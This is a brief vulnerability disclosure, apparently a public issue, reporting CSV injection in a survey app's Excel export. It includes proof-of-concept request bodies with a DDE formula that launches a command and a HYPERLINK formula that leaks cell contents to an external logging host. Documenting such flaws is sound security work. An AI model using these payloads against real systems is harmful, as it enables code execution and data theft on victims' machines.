The data is not filtered properly when exporting excel, which will lead to CSV injection. May cause information disclosure or rce.
Vulnerability url:
/api/public/saveAnswer
/api/answers/download
POC:
rce:
POST /api/public/saveAnswer HTTP/1.1
...
{"answer":{"xxx":{"xxx":"=cmd|'/c calc'!A0"}},"projectId":"xxx","metaInfo":{"answerInfo":{"startTime":1645615171668,"endTime":1645615194031}}}
or
Information disclosure:
POST /api/public/saveAnswer HTTP/1.1
...
{"answer":{"xxx":{"xxx":"=HYPERLINK("http://xxx.ceye.io?test=\"&A2&A3,\"Error: Please click me!")"}},"projectId":"xxx","metaInfo":{"answerInfo":{"startTime":1645615171668,"endTime":1645615194031}}}
steps:
1.Submit questionnaire

or

or others
2.export excel

3.been hacked,looks like:
information disclosure:


rce:

此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
登录 后才可以发表评论